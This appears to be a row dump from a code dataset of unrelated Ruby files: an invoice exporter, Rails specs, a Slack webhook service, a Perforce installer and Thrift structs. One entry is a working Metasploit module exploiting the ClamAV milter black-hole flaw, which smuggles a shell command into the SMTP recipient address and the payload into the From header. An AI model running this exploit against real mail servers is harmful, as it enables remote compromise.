hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
33f59e8d3e46e7fb9b183522440918b1bb3f0c15 | 819 | # frozen_string_literal: true
class InvoiceExporter
HEADERS = [
'Kdnr', 'Name1', 'Name2', 'Strasse', 'Plz', 'Ort',
'RG-Nummer', 'Inkl. MWST', 'exkl. MWST', 'ESR-Ref.Nr.'
].freeze
def initialize(invoices = Invoice.all)
@invoices = invoices
end
def export(options = {})
CSV.generate(**csv_options.merge(options)) do |csv|
csv << HEADERS
@invoices.each { |invoice| csv << invoice_attributes(invoice) }
end
end
def csv_options
{
headers: true, force_quotes: true
}
end
def invoice_attributes(invoice)
invoice.instance_eval do
lagerleiter = unit.lagerleiter
[
unit.id, unit.title,
lagerleiter.full_name, lagerleiter.address, lagerleiter.zip_code, lagerleiter.town,
id, amount, amount, ref
]
end
end
end
| 22.135135 | 91 | 0.632479 |
791768014a38c510b75c79efab8ad3930a33be84 | 417 | require 'spec_helper'
describe Inquiry::Node::Base, type: :model, dbscope: :example do
let(:item) { create :inquiry_node_base }
it_behaves_like "cms_node#spec"
end
describe Inquiry::Node::Form, type: :model, dbscope: :example do
let(:item) { create :inquiry_node_form }
it_behaves_like "cms_node#spec"
it do
expect(item.released).to be_present
expect(item.first_released).to be_present
end
end
| 24.529412 | 64 | 0.736211 |
33e00dc3445699b5e9ce4f98a070c9f185c2be42 | 2,140 | # frozen_string_literal: true
module SamsonSlackWebhooks
class SlackWebhooksService
# users in the format jquery mentions input needs
# see _notify_buddy_box.html.erb
def users
unless slack_api_token
Rails.logger.error('Set the SLACK_API_TOKEN env variable to enabled user mention autocomplete.')
return []
end
Rails.cache.fetch(:slack_users, expires_in: 5.minutes, race_condition_ttl: 5) do
begin
body = JSON.parse(Faraday.post("https://slack.com/api/users.list", token: slack_api_token).body)
if body['ok']
body['members'].map do |user|
{
id: user['id'],
name: user['name'],
avatar: user['profile']['image_48'],
type: 'contact'
}
end
else
Rails.logger.error("Error fetching slack users: #{body['error']}")
[]
end
rescue StandardError
Rails.logger.error("Error fetching slack users (token invalid / service down). #{$!.class}: #{$!}")
[]
end
end
end
def deliver_message_via_webhook(webhook:, message:, attachments:)
payload = {
text: message,
username: 'Samson',
icon_url: "https://github.com/zendesk/samson/blob/master/app/assets/images/favicons/32x32_light.png?raw=true"
}
payload[:channel] = webhook.channel unless webhook.channel.blank?
payload[:attachments] = attachments if attachments.present?
begin
response = Faraday.post(webhook.webhook_url, payload: payload.to_json)
raise "Error #{response.status} #{response.body.to_s[0..100]}" if response.status >= 300
rescue Faraday::ClientError, RuntimeError => e
ErrorNotifier.notify(
e,
webhook_id: webhook.id,
channel: webhook.channel,
url: webhook.stage&.url
)
Rails.logger.error("Could not deliver slack message to webhook #{webhook.id}: #{e.message}")
end
end
private
def slack_api_token
ENV['SLACK_API_TOKEN']
end
end
end
| 33.4375 | 117 | 0.600935 |
f83298d024c2af185d226cd06eb29b42d415ca60 | 5,364 | # frozen_string_literal: true
module Results
module CSV
# Temporarily holds the next row of the CSV output while it is being populated.
# Responsible for preparing the row to receive new answer data by copying common data
# (response data and parent group data) from the previous row of the CSV output.
# Also responsible for dumping rows to the CSV handler when it's time to start a fresh row.
class Buffer
attr_accessor :csv, :output_rows, :header_map, :empty, :group_path,
:applicable_rows_stack, :group_names
delegate :empty?, to: :output_rows
def initialize(header_map:)
self.header_map = header_map
self.group_path = GroupPath.new
self.group_names = {}
self.empty = true
# Holds the rows we are currently collecting information for and waiting to write out to CSV.
# These are all due to a single response. We dump the buffer each time we change responses.
self.output_rows = []
# A stack of frames (arrays) of indices of rows in the buffer.
# Each frame represents a level of nesting.
# The indices in the top-most frame on the stack correspond to rows that should be
# written to when `write` is called.
# It might look like [[0, 1, 2, 3], [2, 3], [3]] if we are in a doubly nested group.
self.applicable_rows_stack = []
end
# Takes a row from the DB result and prepares the buffer for new data.
# Dumps the row when appropriate (i.e. when the group path changes).
def process_row(input_row)
group_path.process_row(input_row)
handle_group_path_deletions if group_path.deletions?
handle_group_path_additions(input_row) if group_path.additions?
write_group_name
end
# Writes the given value to the applicable rows in the buffer.
# If a cell already has something in it and `append` is true, it appends (useful for select_multiple).
# If the given header is not found, ignores.
def write(header, value, append: false)
col_idx = header_map.index_for(header)
return if col_idx.nil?
applicable_rows_stack.last.each do |row_idx|
output_rows[row_idx][col_idx] =
if (current = output_rows[row_idx][col_idx]).present? && append
"#{current};#{value}"
else
value
end
end
end
def finish
dump_rows
end
private
def handle_group_path_deletions
applicable_rows_stack.pop(group_path.deletion_count)
dump_rows if applicable_rows_stack.empty?
end
def handle_group_path_additions(input_row)
group_path.addition_count.times do
add_row
applicable_rows_stack.push([])
# The new row we just added carries information from all levels currently represented
# in the stack. So we write the row index to each frame in the stack.
applicable_rows_stack.each { |r| r << output_rows.size - 1 }
# If we just added the first row, we should write the common columns to get it started.
# Subsequent output_rows will be cloned from this one so we only need to do it once.
write_common_columns(input_row) if output_rows.size == 1
end
end
def write_common_columns(input_row)
header_map.common_headers.each { |h| write(h, input_row[h]) }
end
def write_group_name
write_cell(row_for_current_level, "parent_group_name", current_group_name)
end
# Adds a row to the buffer by cloning the parent row, or if empty, adding a new blank row.
def add_row
new_row =
if output_rows.any?
row_for_current_level.dup
else
Array.new(header_map.count)
end
# We need to reset the group columns because they change each time. The rest of the columns
# should be inherited from the parent column.
write_cell(new_row, "parent_group_name", nil)
write_cell(new_row, "parent_group_depth", applicable_rows_stack.size)
output_rows << new_row
end
def row_for_current_level
# The current row is the first index in the current stack frame. The rest of the indices in
# the current stack frame come from rows for child levels.
current_row_idx = applicable_rows_stack.last.first
output_rows[current_row_idx]
end
def read_cell(row, col_name)
row[header_map.index_for(col_name)]
end
def write_cell(row, col_name, value)
return if row.nil?
row[header_map.index_for(col_name)] = value
end
def dump_rows
output_rows.each do |row|
# No need to write rows that don't have any answers for their level, except we always
# write a row for the top level of the response even if it has no answer data of its own.
next if read_cell(row, "parent_group_depth").positive? && read_cell(row, "parent_group_name").nil?
csv << row
end
output_rows.clear
end
def current_group_name
group_id = group_path.parent_repeat_group_id
return nil if group_id.nil?
group_names[group_id] ||= (QingGroup.find_by(id: group_id)&.group_name || "?")
end
end
end
end
| 38.589928 | 108 | 0.656972 |
2889cb26ce60087343b3da59f2b2ada6881907c6 | 2,793 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Smtp
def initialize(info = {})
super(update_info(info,
'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution',
'Description' => %q{
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
When implemented with black hole mode enabled, it is possible to execute
commands remotely due to an insecure popen call.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-4560' ],
[ 'OSVDB', '36909' ],
[ 'BID', '25439' ],
[ 'URL', 'http://www.milw0rm.com/exploits/4761' ],
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Aug 24 2007',
'DefaultTarget' => 0))
register_options(
[
OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),
], self.class)
end
def exploit
# ClamAV writes randomized msg.###### temporary files in a randomized
# /tmp/clamav-#######################/ directory. This directory is
# the clamav-milter process working directory.
#
# We *can* execute arbitrary code directly from 'sploit', however the
# SMTP RFC rejects all payloads with the exception of generic CMD
# payloads due to the IO redirects. I discovered that the 'From:'
# header is written to this temporary file prior to the vulnerable
# call, so we call the file itself and payload.encoded is executed.
sploit = "sh msg*" # Execute the clamav-milter temporary file.
# Create the malicious RCPT TO before connecting,
# to make good use of the Msf::Exploit::Smtp support.
oldaddr = datastore['MAILTO']
newaddr = oldaddr.split('@')
datastore['MAILTO'] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"
connect_login
sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header
sock.put(".\r\n")
# Clean up RCPT TO afterwards
datastore['MAILTO'] = oldaddr
handler
disconnect
end
end
| 27.93 | 93 | 0.620122 |
91b070ad17c4f229a9e33056afef4dd24f500fd9 | 1,080 | class Team < ApplicationRecord
has_many :primaries
has_many :users, through: :primaries
has_many :shares
has_many :users, through: :shares
has_many :users, through: :alternates
has_many :alternates
has_many :users, through: :trainees
has_many :trainees
has_many :rosters
def get_lead
if self.lead
User.find(self.lead).full_name
else
"Not Set"
end
end
def display_shared
shared = []
self.shares.map { |s| shared << s.user.full_name }
shared.join(", ")
end
def display_alternates
shared = []
unless self.alternates.empty?
self.alternates.map { |s| shared << s.user.full_name }
end
shared.join(", ")
end
def display_trainees
shared = []
unless self.trainees.empty?
self.trainees.map { |s| shared << s.user.full_name }
end
shared.join(", ")
end
def type_1
if self.complexity == "Type 1"
return true
else
return false
end
end
def type_2
if self.complexity == "Type 2"
return true
else
return false
end
end
end
| 18.947368 | 60 | 0.631481 |
1a3cb0101998101bc7163b9dfc8ac5aba80ddf88 | 10,622 | #
# Author: James M. Lawrence <[email protected]>.
#
require 'net/ftp'
require 'rbconfig'
require 'ostruct'
require 'fileutils'
require 'optparse'
require 'pathname'
class Installer
include FileUtils
CONFIG = Config::CONFIG
BIT64 = (1.size == 8)
RB_BASENAME = Pathname.new "P4.rb"
SO_BASENAME = Pathname.new "P4.#{CONFIG['DLEXT']}"
RAW_INSTALL_FILES = [
Pathname.new(CONFIG["sitelibdir"]) + RB_BASENAME,
Pathname.new(CONFIG["sitearchdir"]) + SO_BASENAME,
]
GEM_INSTALL_FILES = [
Pathname.new("lib") + RB_BASENAME,
Pathname.new("ext") + SO_BASENAME,
]
SERVER = "ftp.perforce.com"
SERVER_TOP_DIR = Pathname.new "perforce"
# Mysterious "ghost" releases which lack files
HOSED_VERSIONS = %w[09.3 11.2 12.3 12.4]
P4API_REMOTE_BASENAME = Pathname.new "p4api.tgz"
P4RUBY_REMOTE_BASENAME = Pathname.new "p4ruby.tgz"
WORK_DIR = Pathname.new "work"
DISTFILES_DIR = WORK_DIR + "distfiles"
BUILD_DIR = WORK_DIR + "build"
def parse_command_line
OptionParser.new("Usage: ruby install.rb [options]", 24, "") {
|parser|
parser.on(
"--version NN.N",
"Version to download, e.g. 10.2. Default finds latest.") {
|version|
@s.version = version
}
parser.on(
"--list-versions",
"List available versions.") {
@s.list_versions = true
}
parser.on(
"--platform PLATFORM",
"Perforce-named platform to download. Default guesses.") {
|platform|
@s.platform = platform
}
parser.on(
"--list-platforms",
"List available platforms for the given version.") {
@s.list_platforms = true
}
parser.on(
"--gem",
"Gem configuration (for the gem installer).") {
@s.gem_config = true
}
parser.on(
"--uninstall",
"Uninstall.") {
@s.uninstall = true
}
parser.on(
"--local",
"Use the files in work/distfiles (manual download).") {
@s.local = true
}
parser.parse(ARGV)
}
end
def run
@s = LazyStruct.new
parse_command_line
config
if @s.uninstall
uninstall
elsif @s.list_platforms
puts platforms
elsif @s.list_versions
puts versions
elsif @s.platform.nil?
platform_fail
elsif @s.platform =~ %r!\Ant!
windows_install
else
fetch
build
install
verify_install
end
end
def config
if CONFIG["LIBRUBYARG_SHARED"].empty?
raise "error: ruby must be configured with --enable-shared"
end
@s.p4api = LazyStruct.new.tap { |t|
t.basename = P4API_REMOTE_BASENAME
}
@s.p4ruby = LazyStruct.new.tap { |t|
t.basename = P4RUBY_REMOTE_BASENAME
}
@s.specs = [ @s.p4ruby, @s.p4api ]
@s.specs.each { |spec|
spec.attribute(:local) {
DISTFILES_DIR + spec.basename
}
}
unless @s.platform
@s.attribute(:platform) {
guess_platform
}
end
unless @s.version
@s.attribute(:version) {
latest_version
}
end
@s.attribute(:version_dir) {
SERVER_TOP_DIR + "r#{@s.version}"
}
@s.p4api.attribute(:remote) {
@s.version_dir + "bin.#{@s.platform}" + @s.p4api.basename
}
@s.p4ruby.attribute(:remote) {
@s.version_dir + "bin.tools" + @s.p4ruby.basename
}
@s.attribute(:ftp) {
Net::FTP.new(SERVER).tap { |t|
t.passive = true
t.login
}
}
end
def guess_cpu
if CONFIG["target_os"] =~ %r!darwin!
# specific binaries were removed in p4api-09.1
"u"
else
case CONFIG["target_cpu"]
when %r!ia!i
"ia64"
when %r!86!
# note: with '_'
"x86" + (BIT64 ? "_64" : "")
when %r!(ppc|sparc)!i
# note: without '_'
$1 + (BIT64 ? "64" : "")
else
""
end
end
end
def guess_version(os)
if match = `uname -a`.match(%r!#{os}\s+\S+\s+(\d+)\.(\d+)!i)
version = match.captures.join
cpu = guess_cpu
platforms = self.platforms
(0..version.to_i).map { |n|
[os, n.to_s, cpu].join
}.select { |platform|
platforms.include? platform
}.last
else
nil
end
end
def guess_platform(opts = {})
config_os = CONFIG["target_os"].downcase
windows_cpu = BIT64 ? "x64" : "x86"
if config_os =~ %r!cygwin!i
"cygwin" + windows_cpu
elsif config_os =~ %r!(mswin|mingw)!i
"nt" + windows_cpu
elsif @s.local
"<local>"
else
if match = config_os.match(%r!\A\D+!)
guess_version(match[0])
else
nil
end
end
end
def platform_fail
install_fail {
@s.version = "<version>"
@s.platform = "<platform>"
message = %Q{
Auto-fetch not yet handled for this platform. Run:
\truby install.rb --list-platforms
to see the available platforms, then run
\truby install.rb --platform PLATFORM
with your platform.
If all of the above fails, manually fetch
\tftp://#{SERVER}/#{@s.p4api.remote}
Copy it to #{@s.p4api.local} and run install.rb --local.
}.gsub(%r!^ +(?=\S)!, "")
mkdir_p(DISTFILES_DIR)
puts message
}
end
def install_fail
yield
exit(1)
end
def sys(*args)
system(*args).tap { |result|
unless result
raise "system() failed: #{args.join(" ")}"
end
}
end
def unpack(distfile, target_dir)
sys("tar", "zxvf", distfile.to_s, "-C", target_dir.to_s)
end
def fetch_spec(spec)
unless @s.local
mkdir_p(spec.local.dirname)
puts "downloading ftp://#{SERVER}/#{spec.remote} ..."
@s.ftp.getbinaryfile(spec.remote.to_s, spec.local.to_s)
end
end
def fetch
@s.specs.each { |spec|
fetch_spec(spec)
}
end
def remote_files_matching(dir, regex)
@s.ftp.ls(dir.to_s).map { |entry|
if match = entry.match(regex)
yield match
else
nil
end
}.reject { |entry|
entry.nil?
}
end
def platforms
remote_files_matching(@s.version_dir, %r!bin\.(\w+)!) { |match|
match.captures.first
}.reject { |platform|
platform =~ %r!java!
}.sort
end
def versions
remote_files_matching(SERVER_TOP_DIR, %r!r([0-8]\d\.\d)!) { |match|
match.captures.first
}.reject { |version|
HOSED_VERSIONS.include? version
}.sort
end
def latest_version
versions.last
end
def make(*args)
sys("make", *args)
end
def ruby(*args)
exe = Pathname.new(CONFIG["bindir"]) + CONFIG["RUBY_INSTALL_NAME"]
sys(exe.to_s, *args)
end
def build
puts "building..."
rm_rf(BUILD_DIR)
mkdir_p(BUILD_DIR)
@s.specs.each { |spec|
unpack(spec.local, BUILD_DIR)
}
Dir.chdir(BUILD_DIR) {
api_dir = Pathname.glob("p4api*").last
p4ruby_dir = Pathname.glob("p4ruby*").last
Dir.chdir(p4ruby_dir) {
ruby("p4conf.rb", "--apidir", "../#{api_dir}")
make
}
@s.p4ruby_build_dir = BUILD_DIR + p4ruby_dir
}
end
def raw_install_to_gem_install
RAW_INSTALL_FILES.zip(GEM_INSTALL_FILES) { |source, dest|
mkdir_p(dest.dirname)
puts "move #{source} --> #{dest}"
mv(source, dest)
}
end
def install
puts "installing..."
Dir.chdir(@s.p4ruby_build_dir) {
make("install")
}
if @s.gem_config
raw_install_to_gem_install
end
end
def verify_install(on_error = nil)
puts "verifying..."
files =
if @s.gem_config
GEM_INSTALL_FILES
else
RAW_INSTALL_FILES
end.map { |t| t.expand_path }
if files.all? { |t| t.exist? }
puts "Installed files:"
puts files
elsif on_error
install_fail(&on_error)
else
install_fail {
puts "These files were supposed to be installed, but were not:"
puts files
puts "Install failed!"
}
end
end
def windows_install
#
# For Windows, p4ruby is located in the p4api directory on the
# perforce server -- switcharoo --
#
spec = @s.p4api
version = [CONFIG["MAJOR"], CONFIG["MINOR"]].join
spec.basename = "p4ruby#{version}.exe"
fetch_spec(spec)
error = lambda {
puts "The Perforce P4Ruby Windows installer failed!"
puts "You may re-run it manually here:"
puts spec.local.expand_path
}
puts "running Perforce P4Ruby Windows installer..."
if system(spec.local, "/S", "/v/qn")
if @s.gem_config
sleep(1)
raw_install_to_gem_install
sleep(1)
unless system(spec.local, "/V", "/x", "/S", "/v/qn")
# We don't much care if this fails; just write to the log
puts "Note: the Perforce P4Ruby Windows uninstaller failed."
end
end
verify_install(error)
else
install_fail(&error)
end
end
def uninstall
RAW_INSTALL_FILES.each { |file|
if file.exist?
puts "delete #{file}"
rm_f(file)
end
}
end
end
#
# An OpenStruct with optional lazy-evaluated fields.
#
class LazyStruct < OpenStruct
#
# For mixing into an existing OpenStruct instance singleton class.
#
module Mixin
#
# &block is evaluated when this attribute is requested. The
# same result is returned for subsquent calls, until the field
# is assigned a different value.
#
def attribute(reader, &block)
singleton = (class << self ; self ; end)
singleton.instance_eval {
#
# Define a special reader method in the singleton class.
#
define_method(reader) {
block.call.tap { |value|
#
# The value has been computed. Replace this method with a
# one-liner giving the value.
#
singleton.instance_eval {
remove_method(reader)
define_method(reader) { value }
}
}
}
#
# Revert to the old OpenStruct behavior when the writer is called.
#
writer = "#{reader}=".to_sym
define_method(writer) { |value|
singleton.instance_eval {
remove_method(reader)
remove_method(writer)
}
method_missing(writer, value)
}
}
end
end
include Mixin
end
# version < 1.8.7 compatibility
module Kernel
unless respond_to? :tap
def tap
yield self
self
end
end
end
Installer.new.run
| 22.129167 | 74 | 0.573715 |
ffae24f261c2a4085e94c3d0f0dabd43b76e62fc | 1,221 | module DL
module Win32Types
def included(m)
m.module_eval{
typealias "DWORD", "unsigned long"
typealias "PDWORD", "unsigned long *"
typealias "WORD", "unsigned short"
typealias "PWORD", "unsigned short *"
typealias "BOOL", "int"
typealias "ATOM", "int"
typealias "BYTE", "unsigned char"
typealias "PBYTE", "unsigned char *"
typealias "UINT", "unsigned int"
typealias "ULONG", "unsigned long"
typealias "UCHAR", "unsigned char"
typealias "HANDLE", "unsigned long"
typealias "PHANDLE", "void*"
typealias "PVOID", "void*"
typealias "LPCSTR", "char*"
typealias "LPSTR", "char*"
typealias "HINSTANCE", "unsigned int"
typealias "HDC", "unsigned int"
typealias "HWND", "unsigned int"
}
end
module_function :included
end
module BasicTypes
def included(m)
m.module_eval{
typealias "uint", "unsigned int"
typealias "u_int", "unsigned int"
typealias "ulong", "unsigned long"
typealias "u_long", "unsigned long"
}
end
module_function :included
end
end
| 29.780488 | 46 | 0.568387 |
f8d80d9383d351595078cc55e0ac758d1ec29d9e | 1,894 | require 'rails_helper'
RSpec.describe 'Sign Up' do
let(:user) { User.create(Username: 'Foo Bar', Email: '[email protected]', Password: '12345678') }
scenario 'Sign up ' do
visit new_user_registration_path
fill_in 'Username', with: 'Foo Bar'
fill_in 'Email', with: '[email protected]'
fill_in 'Password', with: '12345678'
fill_in 'Password confirmation', with: '12345678'
click_on 'Sign up'
sleep(3)
visit root_path
expect(page).to have_content('Foo Bar')
end
scenario 'Sign up absard inputs' do
visit new_user_registration_path
fill_in 'Username', with: ''
fill_in 'Email', with: '[email protected]'
fill_in 'Password', with: '12345678'
fill_in 'Password confirmation', with: '12345678'
click_on 'Sign up'
sleep(3)
visit root_path
expect(page).to_not have_content('Foo Bar')
end
end
RSpec.describe 'Sign In', type: :feature do
let(:user) { User.create(username: 'Foo Bar', email: '[email protected]', password: '12345678') }
scenario 'Log in ' do
visit new_user_session_path
fill_in 'Email', with: user.email
fill_in 'Password', with: user.password
click_on 'Log in'
sleep(3)
visit root_path
expect(page).to have_content('Foo Bar')
end
scenario 'Log in with invalid inputs' do
visit new_user_session_path
fill_in 'Email', with: 'xyz'
fill_in 'Password', with: user.password
click_on 'Log in'
sleep(3)
expect(page).to_not have_content('Foo Bar')
end
end
RSpec.describe 'Log Out', type: :feature do
let(:user) { User.create(username: 'Foo Bar', email: '[email protected]', password: '12345678') }
scenario 'Log Out' do
visit new_user_session_path
fill_in 'Email', with: user.email
fill_in 'Password', with: user.password
click_on 'Log in'
sleep(8)
click_on 'sign out'
sleep(3)
visit root_path
expect(page).to have_content('')
end
end
| 28.268657 | 93 | 0.671595 |
87bed5c4f141090f2dae67a2f7febbb13e6832cf | 1,161 | # Copyright 2017 OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
# OpenCensus is a vendor-agnostic single distribution of libraries to provide
# metrics collection and tracing for your services. See https://opencensus.io/
# for general information on OpenCensus.
#
# The OpenCensus module provides a namespace for the Ruby implementation of
# OpenCensus, including the core libraries for OpenCensus metrics and tracing.
#
module OpenCensus
end
require "opencensus/common"
require "opencensus/config"
require "opencensus/context"
require "opencensus/stats"
require "opencensus/tags"
require "opencensus/trace"
require "opencensus/version"
| 34.147059 | 78 | 0.78553 |
034253507fa3321528d587bd0ce58cd16c1de195 | 136 | module Api
module Private
class TopProfileImageSerializer < ActiveModel::Serializer
attributes :image_url
end
end
end
| 17 | 61 | 0.742647 |
28e109b5f9bb35c78cd5d250b1d6e41d535e20c4 | 157 | require "iso3166_ru/version"
require "iso3166_ru/country_list"
module Iso3166Ru
def self.find_by(query)
CountryList.instance.find_by(query)
end
end
| 17.444444 | 39 | 0.789809 |
391d6c0c5ab7bd50dc9cc7f2bc20ea9c20ebe6f3 | 107 | # frozen_string_literal: true
module TTY
class Spinner
VERSION = "10.0.0"
end # Spinner
end # TTY
| 13.375 | 29 | 0.682243 |
264d323544300e5cf490a30877b22433b7a4669c | 34,785 | #
# Autogenerated by Thrift Compiler (0.9.3)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
require 'BoxalinoPackage/thrift'
module DateRangeGap
SECOND = 1
MINUTE = 2
HOUR = 3
DAY = 4
WEEK = 5
MONTH = 6
YEAR = 7
DECADE = 8
CENTURY = 9
VALUE_MAP = {1 => "SECOND", 2 => "MINUTE", 3 => "HOUR", 4 => "DAY", 5 => "WEEK", 6 => "MONTH", 7 => "YEAR", 8 => "DECADE", 9 => "CENTURY"}
VALID_VALUES = Set.new([SECOND, MINUTE, HOUR, DAY, WEEK, MONTH, YEAR, DECADE, CENTURY]).freeze
end
module FacetSortOrder
POPULATION = 1
COLLATION = 2
VALUE_MAP = {1 => "POPULATION", 2 => "COLLATION"}
VALID_VALUES = Set.new([POPULATION, COLLATION]).freeze
end
# Filter to be used in query. Note that type of generated filter depends on first non-null and non-empty value in order of preference. Values of lower priority are ignored:
# stringValues!=null && simpleValues.size()>0 => simple match, prefix!=null => prefix match, hierarchy!=null && hierarchy.size()>0 => hierarchy filter, else range filter
#
# <dl>
# <dt>negative</dt>
# <dd>whether the filter is negative (boolean NOT)</dd>
#
# <dt>fieldName</dt>
# <dd>field name to apply filter to</dd>
#
# <dt>stringValues</dt>
# <dd>values for simple match</dd>
#
# <dt>prefix</dt>
# <dd>prefix match</dd>
#
# <dt>hierarchyId</dt>
# <dd>hierarchy filter - when corresponding hierarchical field has encoded id</dd>
#
# <dt>hierarchy</dt>
# <dd>hierarchy filter - for example categories path in top-down order</dd>
#
# <dt>rangeFrom</dt>
# <dd>lower bound for range filter</dd>
#
# <dt>rangeFromInclusive</dt>
# <dd>whether the lower bound is inclusive</dd>
#
# <dt>rangeTo</dt>
# <dd>upper bound for range filter</dd>
#
# <dt>rangeToInclusive</dt>
# <dd>whether the upper bound is inclusive</dd>
# </dl>
class Filter
include ::Thrift::Struct, ::Thrift::Struct_Union
NEGATIVE = 1
FIELDNAME = 2
STRINGVALUES = 3
PREFIX = 4
HIERARCHYID = 41
HIERARCHY = 5
RANGEFROM = 6
RANGEFROMINCLUSIVE = 7
RANGETO = 8
RANGETOINCLUSIVE = 9
FIELDS = {
NEGATIVE => {:type => ::Thrift::Types::BOOL, :name => 'negative'},
FIELDNAME => {:type => ::Thrift::Types::STRING, :name => 'fieldName'},
STRINGVALUES => {:type => ::Thrift::Types::LIST, :name => 'stringValues', :element => {:type => ::Thrift::Types::STRING}},
PREFIX => {:type => ::Thrift::Types::STRING, :name => 'prefix'},
HIERARCHYID => {:type => ::Thrift::Types::STRING, :name => 'hierarchyId'},
HIERARCHY => {:type => ::Thrift::Types::LIST, :name => 'hierarchy', :element => {:type => ::Thrift::Types::STRING}},
RANGEFROM => {:type => ::Thrift::Types::STRING, :name => 'rangeFrom'},
RANGEFROMINCLUSIVE => {:type => ::Thrift::Types::BOOL, :name => 'rangeFromInclusive'},
RANGETO => {:type => ::Thrift::Types::STRING, :name => 'rangeTo'},
RANGETOINCLUSIVE => {:type => ::Thrift::Types::BOOL, :name => 'rangeToInclusive'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>stringValue</dt>
# <dd>corresponding value of the facet</dd>
#
# <dt>rangeFromInclusive</dt>
# <dd>if range facets lower bound (inclusive)</dd>
#
# <dt>rangeToExclusive</dt>
# <dd>if range facets upper bound (inclusive)</dd>
#
# <dt>hitCount</dt>
# <dd>number of hits found</dd>
#
# <dt>hierarchyId</dt>
# <dd>id of hierarchy if corresponding field is hierarchical</dd>
#
# <dt>hierarchy</dt>
# <dd>hierarchy if corresponding field is hierarchical</dd>
#
# <dt>selected</dt>
# <dd>whether the facet value has been selected in corresponding FacetRequest</dd>
# </dl>
class FacetValue
include ::Thrift::Struct, ::Thrift::Struct_Union
STRINGVALUE = 1
RANGEFROMINCLUSIVE = 2
RANGETOEXCLUSIVE = 3
HITCOUNT = 4
HIERARCHYID = 50
HIERARCHY = 60
SELECTED = 70
FIELDS = {
STRINGVALUE => {:type => ::Thrift::Types::STRING, :name => 'stringValue'},
RANGEFROMINCLUSIVE => {:type => ::Thrift::Types::STRING, :name => 'rangeFromInclusive'},
RANGETOEXCLUSIVE => {:type => ::Thrift::Types::STRING, :name => 'rangeToExclusive'},
HITCOUNT => {:type => ::Thrift::Types::I64, :name => 'hitCount'},
HIERARCHYID => {:type => ::Thrift::Types::STRING, :name => 'hierarchyId'},
HIERARCHY => {:type => ::Thrift::Types::LIST, :name => 'hierarchy', :element => {:type => ::Thrift::Types::STRING}},
SELECTED => {:type => ::Thrift::Types::BOOL, :name => 'selected'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>fieldName</dt>
# <dd>name of the field to get facet for</dd>
#
# <dt>numerical</dt>
# <dd>whether the facet is numerical</dd>
#
# <dt>range</dt>
# <dd>whether the facet is range facet</dd>
#
# <dt>maxCount</dt>
# <dd>maximum number of facets to return by given order, -1 for all of them</dd>
#
# <dt>minPopulation</dt>
# <dd>minimum facet population to return</dd>
#
# <dt>dateRangeGap</dt>
# <dd>if the corresponding field is date then the gap to be used for facet</dd>
#
# <dt>sortOrder</dt>
# <dd>sort order</dd>
#
# <dt>sortAscending</dt>
# <dd>whether the sort should be done ascending</dd>
#
# <dt>selectedValues</dt>
# <dd>values selected from the facet.</dd>
# <dd>Note that results will be filtered by these values, but the corresponding
# FacetResponse is as if this filter was not applied</dd>
#
# <dt>andSelectedValues</dt>
# <dd>whether selectedValues should be considered in AND logic, meaning filter
# out those that don't contain ALL selected values - default is OR - include
# those contianing any of selectedValue</dd>
#
# <dt>boundsOnly</dt>
# <dd>only affects numeric range facets. will always return one FacetValue with rangeFromInclusive and rangeToExclusive
# set according to the actual minimum and maximum value</dd>
# </dl>
class FacetRequest
include ::Thrift::Struct, ::Thrift::Struct_Union
FIELDNAME = 1
NUMERICAL = 2
RANGE = 3
MAXCOUNT = 4
MINPOPULATION = 5
DATERANGEGAP = 6
SORTORDER = 7
SORTASCENDING = 8
SELECTEDVALUES = 90
ANDSELECTEDVALUES = 100
BOUNDSONLY = 110
FIELDS = {
FIELDNAME => {:type => ::Thrift::Types::STRING, :name => 'fieldName'},
NUMERICAL => {:type => ::Thrift::Types::BOOL, :name => 'numerical'},
RANGE => {:type => ::Thrift::Types::BOOL, :name => 'range'},
MAXCOUNT => {:type => ::Thrift::Types::I32, :name => 'maxCount', :default => -1},
MINPOPULATION => {:type => ::Thrift::Types::I32, :name => 'minPopulation', :default => 1},
DATERANGEGAP => {:type => ::Thrift::Types::I32, :name => 'dateRangeGap', :enum_class => ::DateRangeGap},
SORTORDER => {:type => ::Thrift::Types::I32, :name => 'sortOrder', :enum_class => ::FacetSortOrder},
SORTASCENDING => {:type => ::Thrift::Types::BOOL, :name => 'sortAscending'},
SELECTEDVALUES => {:type => ::Thrift::Types::LIST, :name => 'selectedValues', :element => {:type => ::Thrift::Types::STRUCT, :class => ::FacetValue}},
ANDSELECTEDVALUES => {:type => ::Thrift::Types::BOOL, :name => 'andSelectedValues', :default => false},
